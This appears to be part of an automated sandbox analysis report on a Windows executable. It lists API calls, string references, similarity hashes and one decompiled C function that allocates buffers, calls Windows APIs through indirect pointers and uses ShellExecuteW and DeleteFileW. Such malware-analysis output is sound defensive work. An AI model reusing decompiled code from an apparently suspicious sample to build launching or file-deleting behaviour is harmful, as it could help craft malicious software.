0x0040751f
0x00407530
0x0040772f
0x00000000
0x0040772f
0x00407536
0x0040753c
0x0040753f
0x00407547
0x0040754d
0x004076a0
0x004076a6
0x004076ad
0x004076b3
0x004076c3
0x004076c3
0x004076b3
0x004076c9
0x004076c9
0x004076cc
0x004076cd
0x004076d6
0x004076dd
0x004076e6
0x004076fc
0x00407700
0x00000000
0x00000000
0x00000000
0x00407706
0x00407553
0x0040755a
0x00000000
0x00000000
0x00407560
0x00407560
0x0040756f
0x00407572
0x00407580
0x00407583
0x00407588
0x0040758c
0x0040770b
0x0040770e
0x00407717
0x0040771e
0x00407727
0x00000000
0x00407727
0x0040759b
0x004075a9
0x00407708
0x00000000
0x00407708
0x004075c3
0x004075c5
0x004075ca
0x004075cb
0x004075d2
0x004075ee
0x004075f7
0x004075fb
0x004075fe
0x00407609
0x0040760b
0x0040760c
0x00407617
0x00407619
0x00407626
0x00407626
0x00407647
0x0040764c
0x00407651
0x0040765c
0x00407669
0x00407673
0x00407673
0x0040767c
0x00407683
0x00407683
0x0040768a
0x00407693
0x00000000
0x00407693
0x00407762
0x00000000
0x00407762

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004073FE
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407762

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 00407452
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004074A6
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004074FA
ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407673
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 0040767C
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407683
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 0040768A
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407693

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 004076C3
LocalFree.KERNEL32(00407C00,?,?,?,?,?,?,00407C00), ref: 004076CD
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076D6
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076DD
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076E6
LocalFree.KERNEL32(00407C00,?,?,?,?,?,?,00407C00), ref: 0040770E
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407717
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 0040771E
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407727
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407735
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407744
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 0040774D

Strings

open, xrefs: 004076BD

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc$ExecuteShelllstrlen$Global
String ID: open
API String ID: 4025529775-2758837156
Opcode ID: 8cc9a7fa14e8f1167f43eb2d1b354a71b99967cdcb35b4072c78224b2d76d3d9
Instruction ID: c37f464f11a496ac5bed0fa78998882daeccb467a6fdaf8c4272b4e6ddd95f6a
Opcode Fuzzy Hash: 8cc9a7fa14e8f1167f43eb2d1b354a71b99967cdcb35b4072c78224b2d76d3d9
Instruction Fuzzy Hash: 54A1FA72E00215AFDB149BA6DE84D7E7BB5EB44310B004835E905F73A1DB78BD11CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00420F47 Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

__inc.LIBCMTD ref: 00420F8C
_isdigit.LIBCMTD ref: 00420FB2
___check_float_string.LIBCMTD ref: 00421012
__inc.LIBCMTD ref: 00421030
_isdigit.LIBCMTD ref: 004210E2
___check_float_string.LIBCMTD ref: 00421142
___check_float_string.LIBCMTD ref: 004210C9

Part of subcall function 004216A0: __nh_malloc_dbg.LIBCMTD ref: 004216FD

__inc.LIBCMTD ref: 0042108D

Part of subcall function 00421800: __filbuf.LIBCMTD ref: 00421841

___check_float_string.LIBCMTD ref: 004211D6
__inc.LIBCMTD ref: 004211F4
___check_float_string.LIBCMTD ref: 00421237
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6

Strings

+, xrefs: 0042124C

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: ___check_float_string$__inc$Locale_isdigit$UpdateUpdate::~___filbuf__nh_malloc_dbg
String ID: +
API String ID: 1483831053-2126386893
Opcode ID: c35f91d167e3a57fa736c0f9cbc30fc036796ab7872d9175b5daee21bb42ebbd
Instruction ID: 47227cab4d599e2255cfe454b9df9279d6ecde979f53f72c50d2db3852e4d8b6
Opcode Fuzzy Hash: c35f91d167e3a57fa736c0f9cbc30fc036796ab7872d9175b5daee21bb42ebbd
Instruction Fuzzy Hash: 46F194B1E002699BCF24CF99DC80AEEB775BF54304F54819ED81AA7312D7399A80CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004244D6 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 220COMMON

Download Yara Rule

APIs

_wcscpy_s.LIBCMTD ref: 004244FD

Part of subcall function 00419280: __errno.LIBCMTD ref: 004192D4

__invoke_watson_if_error.LIBCMTD ref: 00424506
__invoke_watson_if_error.LIBCMTD ref: 0042457D
__errno.LIBCMTD ref: 004245B2
__errno.LIBCMTD ref: 004245BF

Strings

n#@, xrefs: 00424745, 0042474B
n#@, xrefs: 00424737, 0042473D
n#@, xrefs: 00424729, 0042472F
n#@, xrefs: 0042476F, 00424775, 00424784
`r@, xrefs: 00424556, 0042455C
`r@, xrefs: 00424768, 0042476E
QP#, xrefs: 0042479A
n#@, xrefs: 00424753, 00424759

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __errno$__invoke_watson_if_error$_wcscpy_s
String ID: QP#$`r@$`r@$n#@$n#@$n#@$n#@$n#@
API String ID: 1109857904-2602734993
Opcode ID: 2e6820e7d1c99436e4f461e7e9f65a6fbf290e7f012889dab3cd65e7e718bbde
Instruction ID: c8e87d1946ddb67400bc3ecb9fd161beea858cd9bcaf812c77095ccde34d7992
Opcode Fuzzy Hash: 2e6820e7d1c99436e4f461e7e9f65a6fbf290e7f012889dab3cd65e7e718bbde
Instruction Fuzzy Hash: D6917274E44218ABDB24DF50DC45BEE73B4AB85704F1084AAF609662C1D7BC9ED0CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404F7E Relevance: 30.3, APIs: 24, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404F7E(void* __ecx, short* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				short* _v44;
				void* _v48;
				signed int _v52;
				char _v56;
				signed int _t60;
				void* _t62;
				void* _t71;
				void* _t78;
				void* _t85;
				void* _t94;
				signed int _t103;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t115;
				char _t116;
				void* _t117;
				void* _t127;
				void* _t140;
				signed int _t142;
				void* _t144;
				signed int _t146;
				void* _t165;
				void* _t173;
				signed int _t177;
				void* _t178;
				void* _t180;
				void* _t182;
				void* _t184;
				void* _t187;
				void* _t188;
				signed int _t193;
				signed int _t197;
				void* _t199;
				void* _t202;

				_v24 = _v24 & 0x00000000;
				_t142 = 0;
				_v44 = __edx;
				_v40 = _v40 & 0;
				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e39c);
				_t177 = _t60;
				if(_t177 == 0) {
					return _t60 | 0xffffffff;
				}
				_t178 = _t177 + 0xc;
				_t62 =  *((intOrPtr*)( *0x40e18c))(_t178,  *0x40e1f0);
				if(_t62 == 0) {
					L5:
					_v8 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t178, _t188) + _t64);
					if(E0040A3E4(_t178,  &_v8, 0, _t142) != 0) {
						_t180 = _t178 + _t142 * 2 + 2;
						_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t180) + _t69);
						_v12 = _t71;
						_t193 =  *((intOrPtr*)( *0x40e18c))(_t180,  *0x40e20c) - _t180 >> 1;
						if(E0040A3E4(_t180,  &_v12, 0, _t193) != 0) {
							_t182 = _t180 + _t193 * 2 + 2;
							_t78 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t182) + _t76);
							_v16 = _t78;
							_t197 =  *((intOrPtr*)( *0x40e18c))(_t182,  *0x40e20c) - _t182 >> 1;
							if(E0040A3E4(_t182,  &_v16, 0, _t197) != 0) {
								_t184 = _t182 + _t197 * 2 + 2;
								_t85 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t184) + _t83);
								_push( *0x40e228);
								_v20 = _t85;
								_push(_t184);
								if(E0040A3E4(_t184,  &_v20, 0,  *((intOrPtr*)( *0x40e18c))() - _t184 >> 1) != 0) {
									_t199 =  *((intOrPtr*)( *0x40e044))(0x40, 0x4000);
									_v28 = _t199;
									_t94 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
									_push(0);
									_t144 = _t94;
									_push(0x1a);
									_push(_t144);
									_push(0);
									if( *((intOrPtr*)( *0x40e0c4))() != 0) {
										_push(_v12);
										_push(_t144);
										_push(_t144);
										if( *((intOrPtr*)( *0x40e000))() != 0) {
											_v40 = 1;
											E004052DA(_t144, _t144, _v8, _v16, _v20, _t199,  &_v24);
											if(_v24 > 0) {
												_t109 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t173 = 0x10;
												_t112 = E0040A05F(_t109, _t173);
												_t202 = _t112;
												_v48 = _t202;
												_t115 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t111,  *0x40e210), _t202);
												_v52 = _v52 & 0x00000000;
												_v36 = _t115;
												_t116 =  *0x40e204; // 0x4e5e00
												_v56 = _t116;
												_t117 = E00408619( &_v36);
												_v32 = _t117;
												_t187 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
												_t165 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, 0, 0, 0, 0);
												if(_t165 == 0) {
													_t199 = _v28;
												} else {
													_t127 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, _t187, _t165, 0, 0);
													_t199 = _v28;
													if(_t127 != 0) {
														E00407EDB(_v44, _t187, 0, 0, _v24, _t199, _v32,  &_v56);
													}
												}
												LocalFree(_t187);
												LocalFree(_v32);
												LocalFree(_v36);
												LocalFree(_v48);
											}
										}
									}
									LocalFree(_v8);
									LocalFree(_v12);
									LocalFree(_v16);
									LocalFree(_v20);
									LocalFree(_t144);
									LocalFree(_t199);
									_t103 = _v40;
									L23:
									return _t103;
								}
								LocalFree(_v8);
								LocalFree(_v12);
								LocalFree(_v16);
								LocalFree(_v20);
								_push(0xfffffffa);
								L13:
								_pop(_t103);
								goto L23;
							}
							LocalFree(_v8);
							LocalFree(_v12);
							LocalFree(_v16);
							_push(0xfffffffb);
							goto L13;
						}
						LocalFree(_v8);
						LocalFree(_v12);
						_push(0xfffffffc);
						goto L13;
					}
					LocalFree(_v8);
					_push(0xfffffffd);
					goto L13;
				} else {
					_t146 = _t62 - _t178;
					_t142 = _t146 >> 1;
					if(_t146 >= 0) {
						goto L5;
					}
					_t140 = 0xfffffffe;
					return _t140;
				}
			}

0x00404f89
0x00404f95
0x00404f97
0x00404f9a
0x00404f9e
0x00404fa0
0x00404fa4
0x00000000
0x00404fa6
0x00404fb9
0x00404fbd
0x00404fc1
0x00404fd3
0x00404fef
0x00404ffd
0x0040501d
0x00405028
0x00405030
0x00405044
0x00405053
0x0040507c
0x00405087
0x0040508f
0x004050a3
0x004050b0
0x004050df
0x004050ea
0x004050ec
0x004050f2
0x004050fa
0x00405111
0x0040514d
0x0040515b
0x0040515e
0x00405160
0x00405162
0x00405169
0x0040516b
0x0040516c
0x00405172
0x00405178
0x00405180
0x00405181
0x00405186
0x0040518f
0x004051a5
0x004051b1
0x004051c4
0x004051d0
0x004051d4
0x004051d9
0x004051e4
0x004051ec
0x004051f5
0x004051fa
0x00405201
0x00405204
0x00405209
0x0040520c
0x00405216
0x00405224
0x0040523a
0x0040523e
0x0040527b
0x00405240
0x00405254
0x00405256
0x0040525b
0x00405271
0x00405276
0x0040525b
0x0040527f
0x00405288
0x00405291
0x0040529a
0x0040529a
0x004051b1
0x00405186
0x004052a3
0x004052ac
0x004052b5
0x004052be
0x004052c5
0x004052cc
0x004052d2
0x004052d5
0x00000000
0x004052d5
0x00405116
0x0040511f
0x00405128
0x00405131
0x00405137
0x00405139
0x00405139
0x00000000
0x00405139
0x004050b5
0x004050be
0x004050c7
0x004050cd
0x00000000
0x004050cd
0x00405058
0x00405061
0x00405067
0x00000000
0x00405067
0x00405002
0x00405008
0x00000000
0x00404fc3
0x00404fc5
0x00404fc7
0x00404fc9
0x00000000
0x00000000
0x00404fcd
0x00000000
0x00404fcd

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8864805a19a7b6f1c9d7069d355c260c6df1b2e51c1f69a765a566e797a01f6c
Instruction ID: a5171e7b5a3df4f463689049ce4a04ed549f9b8857e4f558dcc9ab38b60404ef
Opcode Fuzzy Hash: 8864805a19a7b6f1c9d7069d355c260c6df1b2e51c1f69a765a566e797a01f6c
Instruction Fuzzy Hash: 06A1C371A00215AFDB009BEADE45EAE7BB5EF48310F104535F614F72E0DBB86D218B69

Uniqueness

Uniqueness Score: -1.00%

Function 004209EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 387COMMON

Download Yara Rule

APIs

__inc.LIBCMTD ref: 00420A41
__inc.LIBCMTD ref: 00420A69
__inc.LIBCMTD ref: 00420A9C
__un_inc.LIBCMTD ref: 00420B23
_isxdigit.LIBCMTD ref: 00420BBD
__hextodec.LIBCMTD ref: 00420BF0

Strings

8, xrefs: 00420DD5
F, xrefs: 00420EBB

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __inc$__hextodec__un_inc_isxdigit
String ID: 8$F
API String ID: 3652663768-3144575033
Opcode ID: 44975e82e32c5666a07394cae5dd75be6fc01165a8bdc5575b6d52771f1f6d81
Instruction ID: cbc3e990046101d15e9f01f9175547261931542e588062fa9cf526bccf962501
Opcode Fuzzy Hash: 44975e82e32c5666a07394cae5dd75be6fc01165a8bdc5575b6d52771f1f6d81
Instruction Fuzzy Hash: C8028FB0E052698BCF24CF65E8943EEBBB1AF55308F5481DAD81967303D2799E81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0042FED9 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 368COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042FF68
_get_int64_arg.LIBCMTD ref: 0042FF90
__aullrem.LIBCMT ref: 00430135
__aulldiv.LIBCMT ref: 00430157
_write_multi_char.LIBCMTD ref: 0043025E
_write_string.LIBCMTD ref: 00430279
_write_multi_char.LIBCMTD ref: 004302A5
_wctomb_s.LIBCMTD ref: 00430322

Strings

9, xrefs: 00430168
-, xrefs: 004301FE

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
String ID: -$9
API String ID: 3451365851-1631151375
Opcode ID: cb27d96736e196417b3c79b30a33bffabc01b3be02829a97fd44d4dcadda5e2e
Instruction ID: 6fbb936e6e21048b28befd4e543fd591277d1b1e0142e501cd9668f9e3d1ea79
Opcode Fuzzy Hash: cb27d96736e196417b3c79b30a33bffabc01b3be02829a97fd44d4dcadda5e2e
Instruction Fuzzy Hash: 14F14A71D052299FDB24CF58DC99BAEB7B1BB48304F1482EAE409A7241D7389E84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0043124B Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 365COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004312E0
_get_int64_arg.LIBCMTD ref: 00431308
__aullrem.LIBCMT ref: 004314B0
__aulldiv.LIBCMT ref: 004314D2
_write_multi_char.LIBCMTD ref: 004315EB
_write_string.LIBCMTD ref: 00431606
_write_multi_char.LIBCMTD ref: 00431632
__mbtowc_l.LIBCMTD ref: 004316A1

Strings

9, xrefs: 004314E3

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
String ID: 9
API String ID: 3455034128-2366072709
Opcode ID: b16d0459f862c8420226f9aca193c90cfa6dc0c538bc7cc83c81076bc6952c3b
Instruction ID: 2c41f508bb318b1f8b5bc08ec9acbbca8298e5514b934a7e44ca097c7124a9b6
Opcode Fuzzy Hash: b16d0459f862c8420226f9aca193c90cfa6dc0c538bc7cc83c81076bc6952c3b
Instruction Fuzzy Hash: 06F159B1E002299FDB24CF58CC81BAEB7B5FF88314F14519AE509AB251D7389E84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004246D0 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 105windowCOMMON

Download Yara Rule

APIs

__invoke_watson_if_oneof.LIBCMTD ref: 004247CE
__errno.LIBCMTD ref: 004247C6

Part of subcall function 00419D50: __getptd_noexit.LIBCMTD ref: 00419D56

__errno.LIBCMTD ref: 004247D6
_wcscpy_s.LIBCMTD ref: 00424810
__invoke_watson_if_error.LIBCMTD ref: 00424819
___crtMessageBoxW.LIBCMTD ref: 00424832
_raise.LIBCMTD ref: 0042484B

Strings

n#@, xrefs: 00424745, 0042474B
n#@, xrefs: 00424737, 0042473D
n#@, xrefs: 00424729, 0042472F
n#@, xrefs: 0042476F, 00424775, 00424784
n#@, xrefs: 004246E5
`r@, xrefs: 00424768, 0042476E
QP#, xrefs: 0042479A
n#@, xrefs: 00424753, 00424759

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __errno$Message___crt__getptd_noexit__invoke_watson_if_error__invoke_watson_if_oneof_raise_wcscpy_s
String ID: QP#$`r@$n#@$n#@$n#@$n#@$n#@$n#@
API String ID: 1308758192-46180747
Opcode ID: 2461502eb715ff7599928029a8ade488d316d128b4b8fd269882071301a35061
Instruction ID: b7fc949670298f43cf3bc8be79e7bc6415f0d6b645119a4239e0c2d5dbdbef19
Opcode Fuzzy Hash: 2461502eb715ff7599928029a8ade488d316d128b4b8fd269882071301a35061
Instruction Fuzzy Hash: 65415474E44228ABDB24DB91DC46FDA7374AB88704F1040EAF219772C1D6B86EC0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0042FC37 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 241COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042FC3B
__get_printf_count_output.LIBCMTD ref: 0042FC49
__errno.LIBCMTD ref: 0042FCAF
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042FCE5
_write_multi_char.LIBCMTD ref: 0043025E
_write_string.LIBCMTD ref: 00430279
_write_multi_char.LIBCMTD ref: 004302A5
_wctomb_s.LIBCMTD ref: 00430322

Strings

-, xrefs: 004301FE

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output_get_int_arg_wctomb_s_write_string
String ID: -
API String ID: 577823877-2547889144
Opcode ID: 652433eaeae366e57fac5596ad03d7ff55dff337ab454d0776fc57a10d137009
Instruction ID: c1e4325090ae09e2a12d4ba6091b322c4b4b1f9f650ebbe9855a593ce12e5e41
Opcode Fuzzy Hash: 652433eaeae366e57fac5596ad03d7ff55dff337ab454d0776fc57a10d137009
Instruction Fuzzy Hash: 5AA1A070E012289BEB20DF55CC59BEEB7B0AB48304F5042EAE4197A291D7789EC4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406AF4 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 187filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(00000000), ref: 00406BA0
wsprintfW.USER32 ref: 00406C85
lstrlenW.KERNEL32 ref: 00406C92
LocalFree.KERNEL32(?), ref: 00406CAF
DeleteFileW.KERNEL32(?), ref: 00406CE9
LocalFree.KERNEL32(?), ref: 00406CF4
LocalFree.KERNEL32(00000000), ref: 00406CFF
LocalFree.KERNEL32(00000000), ref: 00406D0B
DeleteFileW.KERNEL32(?), ref: 00406D12
LocalFree.KERNEL32(?), ref: 00406D19

Strings

FALSE, xrefs: 00406C65
TRUE, xrefs: 00406C6A, 00406C75

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile$lstrlenwsprintf
String ID: FALSE$TRUE
API String ID: 4168217763-1412513891
Opcode ID: 9678f90ab55edb758f128c11257a790f7dcdeab56316ac4198c1d38be139e42a
Instruction ID: c49cda921923e69c5166418a1bf50fcb18860fb3db535930a4ec2c5e5cba73ac
Opcode Fuzzy Hash: 9678f90ab55edb758f128c11257a790f7dcdeab56316ac4198c1d38be139e42a
Instruction Fuzzy Hash: 25619571A00214AFDF049FA1EE44EAE7BB5EF48310F108439F916B72A1DB759D20DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042067C Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 256COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004206C4
__un_inc.LIBCMTD ref: 00420818
__inc.LIBCMTD ref: 0042084A
__inc.LIBCMTD ref: 00420909
__mbtowc_l.LIBCMTD ref: 0042094B
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6

Strings

], xrefs: 004206DD
{, xrefs: 004207F2
, xrefs: 00420883
{, xrefs: 0042088C

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: Locale__inc$UpdateUpdate::~___mbtowc_l__un_inc_memset
String ID: $]${${
API String ID: 2643002128-1336171634
Opcode ID: 38d49781c0c57a9cad80453b4e34d42b7e599b07b36b725049bdf04ed0c535c3
Instruction ID: 7b836b868101b2461060d44305344fa49ed9a12a9ed4976e40d4580e4bd384a3
Opcode Fuzzy Hash: 38d49781c0c57a9cad80453b4e34d42b7e599b07b36b725049bdf04ed0c535c3
Instruction Fuzzy Hash: 4AB1E870E053A89FCF25DBA9D4906EDFBB1AF55304F14819BE4AA6B343C2385A40CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00418CA0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 206COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMTD ref: 00418CB5

Part of subcall function 0041BCB0: __getptd_noexit.LIBCMTD ref: 0041BCB6
Part of subcall function 0041BCB0: __amsg_exit.LIBCMTD ref: 0041BCC6

Strings

n#@, xrefs: 00418EB1, 00418EB7

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __amsg_exit__getptd__getptd_noexit
String ID: n#@
API String ID: 3939802461-1971128777
Opcode ID: 3d0b54772145becba0183ab7bb485930756f4df450446d99cda099476f9c4312
Instruction ID: a2e9a52059b654bc5406d46ef845d4db42a5e7a7c43eaf5afe2c9885acfdba67
Opcode Fuzzy Hash: 3d0b54772145becba0183ab7bb485930756f4df450446d99cda099476f9c4312
Instruction Fuzzy Hash: 3B819FB5A00209ABDF00DF64DC55FEF77B5AF48304F14845EF908A7281D7789A94CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00412000 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 109windowCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMTD ref: 004120E0
__errno.LIBCMTD ref: 0041210B
__invoke_watson_if_oneof.LIBCMTD ref: 00412113
__errno.LIBCMTD ref: 0041211B
_wcscpy_s.LIBCMTD ref: 00412155
__invoke_watson_if_error.LIBCMTD ref: 0041215E
___crtMessageBoxW.LIBCMTD ref: 00412177
_raise.LIBCMTD ref: 00412190

Strings

T)@, xrefs: 00412058
T)@, xrefs: 004120B4, 004120BA, 004120C9

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __errno$Message___crt__invoke_watson_if_error__invoke_watson_if_oneof__snwprintf_s_raise_wcscpy_s
String ID: T)@$T)@
API String ID: 1843076477-1155104275
Opcode ID: 8929b1f4c9a2aff0a83edb7ae425d7f7bcf08ae553ec47a9f2a36e2b4f1be40b
Instruction ID: c7a4a860db40221b124d43e5a44df49b08fb112f7b311a157247053f3d49ee4d
Opcode Fuzzy Hash: 8929b1f4c9a2aff0a83edb7ae425d7f7bcf08ae553ec47a9f2a36e2b4f1be40b
Instruction Fuzzy Hash: 43417870A40214BBDB24EB90DD4AFDA7374AB48704F0045EAB108B72D1D6FD5AD5CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041200F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMTD ref: 004120E0
__errno.LIBCMTD ref: 0041210B
__invoke_watson_if_oneof.LIBCMTD ref: 00412113
__errno.LIBCMTD ref: 0041211B
_wcscpy_s.LIBCMTD ref: 00412155
__invoke_watson_if_error.LIBCMTD ref: 0041215E
___crtMessageBoxW.LIBCMTD ref: 00412177
_raise.LIBCMTD ref: 00412190

Strings

T)@, xrefs: 00412058
T)@, xrefs: 004120B4, 004120BA, 004120C9

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __errno$Message___crt__invoke_watson_if_error__invoke_watson_if_oneof__snwprintf_s_raise_wcscpy_s
String ID: T)@$T)@
API String ID: 1843076477-1155104275
Opcode ID: 9fdacd669fdcdafbe7e014797b45e44567de6dd3f312136f34c8ba13df4fe3ba
